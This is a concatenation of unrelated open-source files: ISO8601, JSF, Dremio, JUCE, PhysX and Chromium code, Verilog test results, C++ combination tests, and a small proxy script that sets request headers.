// // ISO8601ForCocoaTimeOnlyTests.h // ISO8601ForCocoa // // Created by <NAME> on 2013-09-17. // Copyright (c) 2013 <NAME>. All rights reserved. // #import <XCTest/XCTest.h> @interface ISO8601ForCocoaTimeOnlyTests : XCTestCase - (void) testParsingStringWithOnlyHourMinuteSecondZulu; - (void) testParsingStringWithOnlyHourMinuteZulu; - (void) testParsingStringWithOnlyHourMinuteSecondAndTimeZone; - (void) testParsingStringWithOnlyHourMinuteAndTimeZone; @end
{ "function_endfunction/function_call_function/no_arch": { "test_name": "function_endfunction/function_call_function/no_arch", "verilog": "function_call_function.v", "exit": 134, "errors": [ "function_call_function.v:22:1 [NETLIST] This output (simple_op.function_instance_0.function_instance_1^flip_one) must exist...must be an error" ] }, "function_endfunction/function_call_task_failure/no_arch": { "test_name": "function_endfunction/function_call_task_failure/no_arch", "verilog": "function_call_task_failure.v", "exit": 134, "errors": [ "function_call_task_failure.v:23:2 [AST] Function already has input with this name in" ], "warnings": [ "function_call_task_failure.v:11:8 [PARSE_TO_AST] error in parsing: (syntax error, unexpected '(', expecting '=')" ] }, "function_endfunction/function_input_failure/no_arch": { "test_name": "function_endfunction/function_input_failure/no_arch", "verilog": "function_input_failure.v", "exit": 134, "errors": [ "[PARSE_TO_AST] Parser found (1) errors in your syntax, exiting" ], "warnings": [ "function_input_failure.v:8:1 [PARSE_TO_AST] error in parsing: (syntax error, unexpected ')')" ] }, "function_endfunction/inside_port/no_arch": { "test_name": "function_endfunction/inside_port/no_arch", "verilog": "inside_port.v", "exit": 134, "errors": [ "[PARSE_TO_AST] Parser found (1) errors in your syntax, exiting" ], "warnings": [ "inside_port.v:9:2 [PARSE_TO_AST] error in parsing: (syntax error, unexpected ')', expecting ';' or ',')" ] }, "function_endfunction/multiple_inputs/no_arch": { "test_name": "function_endfunction/multiple_inputs/no_arch", "verilog": "multiple_inputs.v", "max_rss(MiB)": 11.5, "exec_time(ms)": 2.6, "elaboration_time(ms)": 0.3, "optimization_time(ms)": 0, "techmap_time(ms)": 0, "synthesis_time(ms)": 1.2, "Pi": 3, "Po": 1, "logic element": 4, "Longest Path": 5, "Average Path": 4, "Estimated LUTs": 4, "Total Node": 4 }, "function_endfunction/outside_port/no_arch": { "test_name": "function_endfunction/outside_port/no_arch", "verilog": "outside_port.v", "max_rss(MiB)": 15.2, "exec_time(ms)": 9.3, "elaboration_time(ms)": 2.5, "optimization_time(ms)": 0, "techmap_time(ms)": 0, "synthesis_time(ms)": 8, "Pi": 16, "Po": 16, "Longest Path": 2, "Average Path": 2 }, "function_endfunction/time_control_failure/no_arch": { "test_name": "function_endfunction/time_control_failure/no_arch", "verilog": "time_control_failure.v", "exit": 134, "errors": [ "[PARSE_TO_AST] Parser found (1) errors in your syntax, exiting" ], "warnings": [ "time_control_failure.v:17:3 [PARSE_TO_AST] error in parsing: (syntax error, unexpected vALWAYS)" ] }, "DEFAULT": { "test_name": "n/a", "architecture": "n/a", "verilog": "n/a", "exit": 0, "leaks": 0, "errors": [], "warnings": [], "expectation": [], "max_rss(MiB)": -1, "exec_time(ms)": -1, "elaboration_time(ms)": -1, "optimization_time(ms)": -1, "techmap_time(ms)": -1, "synthesis_time(ms)": -1, "Latch Drivers": 0, "Pi": 0, "Po": 0, "logic element": 0, "latch": 0, "Adder": -1, "Multiplier": -1, "Memory": -1, "Hard Ip": -1, "generic logic size": -1, "Longest Path": 0, "Average Path": 0, "Estimated LUTs": 0, "Total Node": 0 } }
<gh_stars>1000+ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.web.jsf.impl.facesmodel; import java.util.ArrayList; import java.util.List; import org.netbeans.modules.web.jsf.api.facesmodel.FacesManagedProperty; import org.netbeans.modules.web.jsf.api.facesmodel.JSFConfigVisitor; import org.w3c.dom.Element; /** * @author ads * */ class ManagedPropertyImpl extends IdentifiableDescriptionGroupImpl implements FacesManagedProperty { ManagedPropertyImpl( JSFConfigModelImpl model, Element element ) { super(model, element); } ManagedPropertyImpl( JSFConfigModelImpl model ) { this(model, createElementNS(model, JSFConfigQNames.MANAGED_PROPERTY)); } /* (non-Javadoc) * @see org.netbeans.modules.web.jsf.api.facesmodel.FacesManagedProperty#setPropertyClass(java.lang.String) */ public void setPropertyClass( String clazz ) { setChildElementText(PROPERT_CLASS, clazz, JSFConfigQNames.PROPERTY_CLASS.getQName(getNamespaceURI())); } /* (non-Javadoc) * @see org.netbeans.modules.web.jsf.api.facesmodel.FacesManagedProperty#setPropertyName(java.lang.String) */ public void setPropertyName( String name ) { setChildElementText(PROPERT_NAME, name, JSFConfigQNames.PROPERTY_NAME.getQName(getNamespaceURI())); } /* (non-Javadoc) * @see org.netbeans.modules.web.jsf.api.facesmodel.JSFConfigComponent#accept(org.netbeans.modules.web.jsf.api.facesmodel.JSFConfigVisitor) */ public void accept( JSFConfigVisitor visitor ) { visitor.visit( this ); } /** * Gets property-class of the faces-config-managed-propertyType. * @return trimmed property-class if any, {@code null} otherwise */ public String getPropertyClass() { String propertyClass = getChildElementText(JSFConfigQNames.PROPERTY_CLASS.getQName(getNamespaceURI())); return ElementTypeHelper.pickJavaTypeType(propertyClass); } /** * Gets property-name of the faces-config-managed-propertyType. * @return trimmed property-name if any, {@code null} otherwise */ public String getPropertyName() { String propertyName = getChildElementText(JSFConfigQNames.PROPERTY_NAME.getQName(getNamespaceURI())); return ElementTypeHelper.pickString(propertyName); } protected List<String> getSortedListOfLocalNames(){ return SORTED_ELEMENTS; } protected static final List<String> SORTED_ELEMENTS = new ArrayList<String>(5); static { SORTED_ELEMENTS.addAll( DESCRIPTION_GROUP_SORTED_ELEMENTS); SORTED_ELEMENTS.add( PROPERT_NAME); SORTED_ELEMENTS.add( PROPERT_CLASS ); } }
1,267
1,085
/* * Copyright (C) 2017-2019 Dremio Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.dremio.dac.model.sources; import java.util.HashMap; import java.util.List; import java.util.Map; import com.dremio.dac.model.common.AddressableResource; import com.dremio.dac.model.common.ResourcePath; import com.dremio.dac.model.job.JobFilters; import com.dremio.service.jobs.JobIndexKeys; import com.dremio.service.namespace.physicaldataset.proto.PhysicalDatasetConfig; import com.fasterxml.jackson.annotation.JsonCreator; import com.fasterxml.jackson.annotation.JsonIgnoreProperties; import com.fasterxml.jackson.annotation.JsonProperty; /** * Raw dataset/table */ @JsonIgnoreProperties(value={"links"}, allowGetters=true) public class PhysicalDataset implements AddressableResource { private final PhysicalDatasetConfig datasetConfig; private final PhysicalDatasetResourcePath resourcePath; private final PhysicalDatasetName datasetName; private final Integer jobCount; private final List<String> tags; @JsonCreator public PhysicalDataset( @JsonProperty("resourcePath") PhysicalDatasetResourcePath resourcePath, @JsonProperty("datasetName") PhysicalDatasetName datasetName, @JsonProperty("datasetConfig") PhysicalDatasetConfig datasetConfig, @JsonProperty("jobCount") Integer jobCount, @JsonProperty("tags") List<String> tags) { this.resourcePath = resourcePath; this.datasetName = datasetName; this.datasetConfig = datasetConfig; this.jobCount = jobCount; this.tags = tags; } @Override public ResourcePath getResourcePath() { return resourcePath; } public PhysicalDatasetConfig getDatasetConfig() { return datasetConfig; } public PhysicalDatasetName getDatasetName() { return datasetName; } public Integer getJobCount() { return jobCount; } public Map<String, String> getLinks() { List<String> fullPathList = datasetConfig.getFullPathList(); PhysicalDatasetPath datasetPath = new PhysicalDatasetPath(fullPathList); Map<String, String> links = new HashMap<>(); links.put("self", datasetPath.toUrlPath()); links.put("query", datasetPath.getQueryUrlPath()); final JobFilters jobFilters = new JobFilters() .addFilter(JobIndexKeys.ALL_DATASETS, datasetPath.toString()) .addFilter(JobIndexKeys.QUERY_TYPE, JobIndexKeys.UI, JobIndexKeys.EXTERNAL); links.put("jobs", jobFilters.toUrl()); return links; } public List<String> getTags() { return tags; } }
969
2,270
/* ============================================================================== This file is part of the JUCE library. Copyright (c) 2020 - Raw Material Software Limited JUCE is an open source library subject to commercial or open-source licensing. The code included in this file is provided under the terms of the ISC license http://www.isc.org/downloads/software-support-policy/isc-license. Permission To use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted provided that the above copyright notice and this permission notice appear in all copies. JUCE IS PROVIDED "AS IS" WITHOUT ANY WARRANTY, AND ALL WARRANTIES, WHETHER EXPRESSED OR IMPLIED, INCLUDING MERCHANTABILITY AND FITNESS FOR PURPOSE, ARE DISCLAIMED. ============================================================================== */ namespace juce { int64 juce_fileSetPosition (void* handle, int64 pos); //============================================================================== FileInputStream::FileInputStream (const File& f) : file (f) { openHandle(); } int64 FileInputStream::getTotalLength() { // You should always check that a stream opened successfully before using it! jassert (openedOk()); return file.getSize(); } int FileInputStream::read (void* buffer, int bytesToRead) { // You should always check that a stream opened successfully before using it! jassert (openedOk()); // The buffer should never be null, and a negative size is probably a // sign that something is broken! jassert (buffer != nullptr && bytesToRead >= 0); auto num = readInternal (buffer, (size_t) bytesToRead); currentPosition += (int64) num; return (int) num; } bool FileInputStream::isExhausted() { return currentPosition >= getTotalLength(); } int64 FileInputStream::getPosition() { return currentPosition; } bool FileInputStream::setPosition (int64 pos) { // You should always check that a stream opened successfully before using it! jassert (openedOk()); if (pos != currentPosition) currentPosition = juce_fileSetPosition (fileHandle, pos); return currentPosition == pos; } //============================================================================== //============================================================================== #if JUCE_UNIT_TESTS struct FileInputStreamTests : public UnitTest { FileInputStreamTests() : UnitTest ("FileInputStream", UnitTestCategories::streams) {} void runTest() override { beginTest ("Open stream non-existent file"); { auto tempFile = File::createTempFile (".txt"); expect (! tempFile.exists()); FileInputStream stream (tempFile); expect (stream.failedToOpen()); } beginTest ("Open stream existing file"); { auto tempFile = File::createTempFile (".txt"); tempFile.create(); expect (tempFile.exists()); FileInputStream stream (tempFile); expect (stream.openedOk()); } const MemoryBlock data ("abcdefghijklmnopqrstuvwxyz", 26); File f (File::createTempFile (".txt")); f.appendData (data.getData(), data.getSize()); FileInputStream stream (f); beginTest ("Read"); { expectEquals (stream.getPosition(), (int64) 0); expectEquals (stream.getTotalLength(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), stream.getTotalLength()); expect (! 
stream.isExhausted()); size_t numBytesRead = 0; MemoryBlock readBuffer (data.getSize()); while (numBytesRead < data.getSize()) { numBytesRead += (size_t) stream.read (&readBuffer[numBytesRead], 3); expectEquals (stream.getPosition(), (int64) numBytesRead); expectEquals (stream.getNumBytesRemaining(), (int64) (data.getSize() - numBytesRead)); expect (stream.isExhausted() == (numBytesRead == data.getSize())); } expectEquals (stream.getPosition(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), (int64) 0); expect (stream.isExhausted()); expect (readBuffer == data); } beginTest ("Skip"); { stream.setPosition (0); expectEquals (stream.getPosition(), (int64) 0); expectEquals (stream.getTotalLength(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), stream.getTotalLength()); expect (! stream.isExhausted()); size_t numBytesRead = 0; const int numBytesToSkip = 5; while (numBytesRead < data.getSize()) { stream.skipNextBytes (numBytesToSkip); numBytesRead += numBytesToSkip; numBytesRead = std::min (numBytesRead, data.getSize()); expectEquals (stream.getPosition(), (int64) numBytesRead); expectEquals (stream.getNumBytesRemaining(), (int64) (data.getSize() - numBytesRead)); expect (stream.isExhausted() == (numBytesRead == data.getSize())); } expectEquals (stream.getPosition(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), (int64) 0); expect (stream.isExhausted()); f.deleteFile(); } } }; static FileInputStreamTests fileInputStreamTests; #endif } // namespace juce
2,322
445
<reponame>ThomasGale/pytorch-cpp-rl<gh_stars>100-1000 #pragma once #include <torch/torch.h> namespace cpprl { class Distribution { protected: std::vector<int64_t> batch_shape, event_shape; std::vector<int64_t> extended_shape(c10::ArrayRef<int64_t> sample_shape); public: virtual ~Distribution() = 0; virtual torch::Tensor entropy() = 0; virtual torch::Tensor log_prob(torch::Tensor value) = 0; virtual torch::Tensor sample(c10::ArrayRef<int64_t> sample_shape = {}) = 0; }; inline Distribution::~Distribution() {} }
213
2,372
<reponame>Toolchefs/PhysX<gh_stars>1000+ // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // * Neither the name of NVIDIA CORPORATION nor the names of its // contributors may be used to endorse or promote products derived // from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ''AS IS'' AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY // OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Copyright (c) 2008-2021 NVIDIA Corporation. All rights reserved. // Copyright (c) 2004-2008 AGEIA Technologies, Inc. All rights reserved. // Copyright (c) 2001-2004 NovodeX AG. All rights reserved. #ifndef PX_JOINTCONSTRAINT_H #define PX_JOINTCONSTRAINT_H /** \addtogroup extensions @{ */ #include "foundation/PxTransform.h" #include "PxRigidActor.h" #include "PxConstraint.h" #include "common/PxBase.h" #if !PX_DOXYGEN namespace physx { #endif class PxRigidActor; class PxScene; class PxPhysics; class PxConstraint; /** \brief an enumeration of PhysX' built-in joint types @see PxJoint */ struct PxJointConcreteType { enum Enum { eSPHERICAL = PxConcreteType::eFIRST_PHYSX_EXTENSION, eREVOLUTE, ePRISMATIC, eFIXED, eDISTANCE, eD6, eCONTACT, eLast }; }; PX_DEFINE_TYPEINFO(PxJoint, PxConcreteType::eUNDEFINED) PX_DEFINE_TYPEINFO(PxD6Joint, PxJointConcreteType::eD6) PX_DEFINE_TYPEINFO(PxDistanceJoint, PxJointConcreteType::eDISTANCE) PX_DEFINE_TYPEINFO(PxContactJoint, PxJointConcreteType::eCONTACT) PX_DEFINE_TYPEINFO(PxFixedJoint, PxJointConcreteType::eFIXED) PX_DEFINE_TYPEINFO(PxPrismaticJoint, PxJointConcreteType::ePRISMATIC) PX_DEFINE_TYPEINFO(PxRevoluteJoint, PxJointConcreteType::eREVOLUTE) PX_DEFINE_TYPEINFO(PxSphericalJoint, PxJointConcreteType::eSPHERICAL) /** \brief an enumeration for specifying one or other of the actors referenced by a joint @see PxJoint */ struct PxJointActorIndex { enum Enum { eACTOR0, eACTOR1, COUNT }; }; /** \brief a base interface providing common functionality for PhysX joints */ class PxJoint : public PxBase { //= ATTENTION! ===================================================================================== // Changing the data layout of this class breaks the binary serialization format. See comments for // PX_BINARY_SERIAL_VERSION. If a modification is required, please adjust the getBinaryMetaData // function. If the modification is made on a custom branch, please change PX_BINARY_SERIAL_VERSION // accordingly. 
//================================================================================================== public: /** \brief Set the actors for this joint. An actor may be NULL to indicate the world frame. At most one of the actors may be NULL. \param[in] actor0 the first actor. \param[in] actor1 the second actor @see getActors() */ virtual void setActors(PxRigidActor* actor0, PxRigidActor* actor1) = 0; /** \brief Get the actors for this joint. \param[out] actor0 the first actor. \param[out] actor1 the second actor @see setActors() */ virtual void getActors(PxRigidActor*& actor0, PxRigidActor*& actor1) const = 0; /** \brief Set the joint local pose for an actor. This is the relative pose which locates the joint frame relative to the actor. \param[in] actor 0 for the first actor, 1 for the second actor. \param[in] localPose the local pose for the actor this joint @see getLocalPose() */ virtual void setLocalPose(PxJointActorIndex::Enum actor, const PxTransform& localPose) = 0; /** \brief get the joint local pose for an actor. \param[in] actor 0 for the first actor, 1 for the second actor. return the local pose for this joint @see setLocalPose() */ virtual PxTransform getLocalPose(PxJointActorIndex::Enum actor) const = 0; /** \brief get the relative pose for this joint This function returns the pose of the joint frame of actor1 relative to actor0 */ virtual PxTransform getRelativeTransform() const = 0; /** \brief get the relative linear velocity of the joint This function returns the linear velocity of the origin of the constraint frame of actor1, relative to the origin of the constraint frame of actor0. The value is returned in the constraint frame of actor0 */ virtual PxVec3 getRelativeLinearVelocity() const = 0; /** \brief get the relative angular velocity of the joint This function returns the angular velocity of actor1 relative to actor0. The value is returned in the constraint frame of actor0 */ virtual PxVec3 getRelativeAngularVelocity() const = 0; /** \brief set the break force for this joint. if the constraint force or torque on the joint exceeds the specified values, the joint will break, at which point it will not constrain the two actors and the flag PxConstraintFlag::eBROKEN will be set. The force and torque are measured in the joint frame of the first actor \param[in] force the maximum force the joint can apply before breaking \param[in] torque the maximum torque the joint can apply before breaking */ virtual void setBreakForce(PxReal force, PxReal torque) = 0; /** \brief get the break force for this joint. \param[out] force the maximum force the joint can apply before breaking \param[out] torque the maximum torque the joint can apply before breaking @see setBreakForce() */ virtual void getBreakForce(PxReal& force, PxReal& torque) const = 0; /** \brief set the constraint flags for this joint. \param[in] flags the constraint flags @see PxConstraintFlag */ virtual void setConstraintFlags(PxConstraintFlags flags) = 0; /** \brief set a constraint flags for this joint to a specified value. \param[in] flag the constraint flag \param[in] value the value to which to set the flag @see PxConstraintFlag */ virtual void setConstraintFlag(PxConstraintFlag::Enum flag, bool value) = 0; /** \brief get the constraint flags for this joint. \return the constraint flags @see PxConstraintFlag */ virtual PxConstraintFlags getConstraintFlags() const = 0; /** \brief set the inverse mass scale for actor0. 
\param[in] invMassScale the scale to apply to the inverse mass of actor 0 for resolving this constraint @see getInvMassScale0 */ virtual void setInvMassScale0(PxReal invMassScale) = 0; /** \brief get the inverse mass scale for actor0. \return inverse mass scale for actor0 @see setInvMassScale0 */ virtual PxReal getInvMassScale0() const = 0; /** \brief set the inverse inertia scale for actor0. \param[in] invInertiaScale the scale to apply to the inverse inertia of actor0 for resolving this constraint @see getInvMassScale0 */ virtual void setInvInertiaScale0(PxReal invInertiaScale) = 0; /** \brief get the inverse inertia scale for actor0. \return inverse inertia scale for actor0 @see setInvInertiaScale0 */ virtual PxReal getInvInertiaScale0() const = 0; /** \brief set the inverse mass scale for actor1. \param[in] invMassScale the scale to apply to the inverse mass of actor 1 for resolving this constraint @see getInvMassScale1 */ virtual void setInvMassScale1(PxReal invMassScale) = 0; /** \brief get the inverse mass scale for actor1. \return inverse mass scale for actor1 @see setInvMassScale1 */ virtual PxReal getInvMassScale1() const = 0; /** \brief set the inverse inertia scale for actor1. \param[in] invInertiaScale the scale to apply to the inverse inertia of actor1 for resolving this constraint @see getInvInertiaScale1 */ virtual void setInvInertiaScale1(PxReal invInertiaScale) = 0; /** \brief get the inverse inertia scale for actor1. \return inverse inertia scale for actor1 @see setInvInertiaScale1 */ virtual PxReal getInvInertiaScale1() const = 0; /** \brief Retrieves the PxConstraint corresponding to this joint. This can be used to determine, among other things, the force applied at the joint. \return the constraint */ virtual PxConstraint* getConstraint() const = 0; /** \brief Sets a name string for the object that can be retrieved with getName(). This is for debugging and is not used by the SDK. The string is not copied by the SDK, only the pointer is stored. \param[in] name String to set the objects name to. @see getName() */ virtual void setName(const char* name) = 0; /** \brief Retrieves the name string set with setName(). \return Name string associated with object. @see setName() */ virtual const char* getName() const = 0; /** \brief Deletes the joint. \note This call does not wake up the connected rigid bodies. */ virtual void release() = 0; /** \brief Retrieves the scene which this joint belongs to. \return Owner Scene. NULL if not part of a scene. @see PxScene */ virtual PxScene* getScene() const = 0; void* userData; //!< user can assign this to whatever, usually to create a 1:1 relationship with a user object. //serialization /** \brief Put class meta data in stream, used for serialization */ static void getBinaryMetaData(PxOutputStream& stream); //~serialization protected: virtual ~PxJoint() {} //serialization /** \brief Constructor */ PX_INLINE PxJoint(PxType concreteType, PxBaseFlags baseFlags) : PxBase(concreteType, baseFlags), userData(NULL) {} /** \brief Deserialization constructor */ PX_INLINE PxJoint(PxBaseFlags baseFlags) : PxBase(baseFlags) {} /** \brief Returns whether a given type name matches with the type of this instance */ virtual bool isKindOf(const char* name) const { return !::strcmp("PxJoint", name) || PxBase::isKindOf(name); } //~serialization }; class PxSpring { //= ATTENTION! ===================================================================================== // Changing the data layout of this class breaks the binary serialization format. 
See comments for // PX_BINARY_SERIAL_VERSION. If a modification is required, please adjust the getBinaryMetaData // function. If the modification is made on a custom branch, please change PX_BINARY_SERIAL_VERSION // accordingly. //================================================================================================== public: PxReal stiffness; //!< the spring strength of the drive: that is, the force proportional to the position error PxReal damping; //!< the damping strength of the drive: that is, the force proportional to the velocity error PxSpring(PxReal stiffness_, PxReal damping_): stiffness(stiffness_), damping(damping_) {} }; #if !PX_DOXYGEN } // namespace physx #endif /** \brief Helper function to setup a joint's global frame This replaces the following functions from previous SDK versions: void NxJointDesc::setGlobalAnchor(const NxVec3& wsAnchor); void NxJointDesc::setGlobalAxis(const NxVec3& wsAxis); The function sets the joint's localPose using world-space input parameters. \param[in] wsAnchor Global frame anchor point. <b>Range:</b> position vector \param[in] wsAxis Global frame axis. <b>Range:</b> direction vector \param[in,out] joint Joint having its global frame set. */ PX_C_EXPORT void PX_CALL_CONV PxSetJointGlobalFrame(physx::PxJoint& joint, const physx::PxVec3* wsAnchor, const physx::PxVec3* wsAxis); /** @} */ #endif
4,050
629
headers = dict({"X-MIP-ACCESS-TOKEN": "XXXXXxXX-xxXX-<PASSWORD>-<PASSWORD>-<PASSWORD>", "X-MIP-CHANNEL": "ANDROID", "X-MIP-Device-Id": "1", "X-MIP-APP-VERSION": "1.0.1", "X-MIP-APP-VERSION-ID": "1"}); def sendingRequest(msg, initiator, helper): for x in list(headers): msg.getRequestHeader().setHeader(x, headers[x]); def responseReceived(msg, initiator, helper): pass;
241
1,050
#define DEFINE_DEFAULT_ITERATOR_CTOR #define CHAR_RANGE_DEFAULT_CONSTRUCTIBLE #include "helpers.hpp" #undef CHAR_RANGE_DEFAULT_CONSTRUCTIBLE #undef DEFINE_DEFAULT_ITERATOR_CTOR #include <combinations.hpp> #include <iterator> #include <set> #include <string> #include <vector> #include "catch.hpp" using iter::combinations; using itertest::BasicIterable; using itertest::SolidInt; using CharCombSet = std::vector<std::vector<char>>; TEST_CASE("combinations: Simple combination of 4", "[combinations]") { std::string s{"ABCD"}; CharCombSet sc; SECTION("Normal call") { for (auto&& v : combinations(s, 2)) { sc.emplace_back(std::begin(v), std::end(v)); } } SECTION("Pipe") { for (auto&& v : s | combinations(2)) { sc.emplace_back(std::begin(v), std::end(v)); } } CharCombSet ans = { {'A', 'B'}, {'A', 'C'}, {'A', 'D'}, {'B', 'C'}, {'B', 'D'}, {'C', 'D'}}; REQUIRE(ans == sc); } TEST_CASE("combinations: const iteration", "[combinations][const]") { std::string s{"ABCD"}; CharCombSet sc; const auto comb = combinations(s, 2); for (auto&& v : comb) { sc.emplace_back(std::begin(v), std::end(v)); } CharCombSet ans = { {'A', 'B'}, {'A', 'C'}, {'A', 'D'}, {'B', 'C'}, {'B', 'D'}, {'C', 'D'}}; REQUIRE(ans == sc); } TEST_CASE( "combinations: const iterators can be compared to non-const iterators", "[combinations][const]") { std::string s{"ABC"}; auto c = combinations(s, 2); const auto& cc = c; (void)(std::begin(c) == std::end(cc)); } TEST_CASE("combinations: Works with different begin and end types", "[combinations]") { CharRange cr{'e'}; CharCombSet sc; for (auto&& v : combinations(cr, 2)) { sc.emplace_back(std::begin(v), std::end(v)); } CharCombSet ans = { {'a', 'b'}, {'a', 'c'}, {'a', 'd'}, {'b', 'c'}, {'b', 'd'}, {'c', 'd'}}; REQUIRE(ans == sc); } TEST_CASE("combinations: iterators can be compared", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 2); auto it = std::begin(c); REQUIRE(it == std::begin(c)); REQUIRE_FALSE(it != std::begin(c)); ++it; REQUIRE(it != std::begin(c)); REQUIRE_FALSE(it == std::begin(c)); } TEST_CASE("combinations: operator->", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 2); auto it = std::begin(c); REQUIRE(it->size() == 2); } TEST_CASE("combinations: size too large gives no results", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 5); REQUIRE(std::begin(c) == std::end(c)); } TEST_CASE("combinations: size 0 gives nothing", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 0); REQUIRE(std::begin(c) == std::end(c)); } TEST_CASE( "combinations: iterable without operator*() const", "[combinations]") { BasicIterable<char> bi{'x', 'y', 'z'}; auto c = combinations(bi, 1); auto it = std::begin(c); ++it; (*it)[0]; } TEST_CASE("combinations: binds to lvalues, moves rvalues", "[combinations]") { BasicIterable<char> bi{'x', 'y', 'z'}; SECTION("binds to lvalues") { combinations(bi, 1); REQUIRE_FALSE(bi.was_moved_from()); } SECTION("moves rvalues") { combinations(std::move(bi), 1); REQUIRE(bi.was_moved_from()); } } TEST_CASE("combinations: doesn't move or copy elements of iterable", "[combinations]") { constexpr SolidInt arr[] = {{6}, {7}, {8}}; for (auto&& i : combinations(arr, 1)) { (void)i; } } TEST_CASE("combinations: iterator meets requirements", "[combinations]") { std::string s{"abc"}; auto c = combinations(s, 1); REQUIRE(itertest::IsIterator<decltype(std::begin(c))>::value); auto&& row = *std::begin(c); REQUIRE(itertest::IsIterator<decltype(std::begin(row))>::value); } template <typename T> using ImpT = 
decltype(combinations(std::declval<T>(), 1)); TEST_CASE("combinations: has correct ctor and assign ops", "[combinations]") { REQUIRE(itertest::IsMoveConstructibleOnly<ImpT<std::string&>>::value); REQUIRE(itertest::IsMoveConstructibleOnly<ImpT<std::string>>::value); }
1,636
335
{ "word": "Practically", "definitions": [ "Virtually; almost.", "In a practical manner.", "In practical terms." ], "parts-of-speech": "Adverb" }
85
575
<gh_stars>100-1000 // Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "ash/wm/window_cycle/window_cycle_tab_slider_button.h" #include "ash/style/ash_color_provider.h" #include "base/strings/utf_string_conversions.h" #include "ui/gfx/canvas.h" #include "ui/views/background.h" #include "ui/views/controls/label.h" #include "ui/views/layout/box_layout.h" #include "ui/views/metadata/metadata_impl_macros.h" namespace ash { namespace { // The height of the tab slider button. constexpr int kTabSliderButtonHeight = 32; // The horizontal insets between the label and the button. constexpr int kTabSliderButtonHorizontalInsets = 20; // The font size of the button label. constexpr int kTabSliderButtonLabelFontSizeDp = 13; } // namespace WindowCycleTabSliderButton::WindowCycleTabSliderButton( views::Button::PressedCallback callback, const std::u16string& label_text) : LabelButton(std::move(callback), label_text) { SetHorizontalAlignment(gfx::ALIGN_CENTER); label()->SetFontList( label() ->font_list() .DeriveWithSizeDelta(kTabSliderButtonLabelFontSizeDp - label()->font_list().GetFontSize()) .DeriveWithWeight(gfx::Font::Weight::MEDIUM)); SetEnabledTextColors(AshColorProvider::Get()->GetContentLayerColor( AshColorProvider::ContentLayerType::kTextColorPrimary)); } void WindowCycleTabSliderButton::SetToggled(bool is_toggled) { if (is_toggled == toggled_) return; toggled_ = is_toggled; SetEnabledTextColors(AshColorProvider::Get()->GetContentLayerColor( toggled_ ? AshColorProvider::ContentLayerType::kButtonLabelColorPrimary : AshColorProvider::ContentLayerType::kTextColorPrimary)); } gfx::Size WindowCycleTabSliderButton::CalculatePreferredSize() const { return gfx::Size(label()->GetPreferredSize().width() + 2 * kTabSliderButtonHorizontalInsets, kTabSliderButtonHeight); } BEGIN_METADATA(WindowCycleTabSliderButton, views::LabelButton) END_METADATA } // namespace ash
805
1,144
<gh_stars>1000+ package de.metas.purchasecandidate; import java.util.List; import java.util.Map; import java.util.Optional; import javax.annotation.Nullable; import org.adempiere.mm.attributes.AttributeSetInstanceId; import org.compiere.model.I_C_BPartner; import org.compiere.model.I_C_BPartner_Product; import org.springframework.stereotype.Service; import com.google.common.collect.ImmutableList; import de.metas.bpartner.BPartnerId; import de.metas.bpartner.BPartnerType; import de.metas.bpartner.service.IBPartnerBL; import de.metas.bpartner.service.IBPartnerDAO; import de.metas.bpartner_product.IBPartnerProductDAO; import de.metas.organization.OrgId; import de.metas.pricing.conditions.PricingConditions; import de.metas.pricing.conditions.PricingConditionsId; import de.metas.pricing.conditions.service.IPricingConditionsRepository; import de.metas.product.IProductBL; import de.metas.product.IProductDAO; import de.metas.product.ProductAndCategoryAndManufacturerId; import de.metas.product.ProductId; import de.metas.util.Loggables; import de.metas.util.Services; import de.metas.common.util.CoalesceUtil; import de.metas.util.lang.Percent; import lombok.NonNull; /* * #%L * de.metas.purchasecandidate.base * %% * Copyright (C) 2018 metas GmbH * %% * This program is free software: you can redistribute it 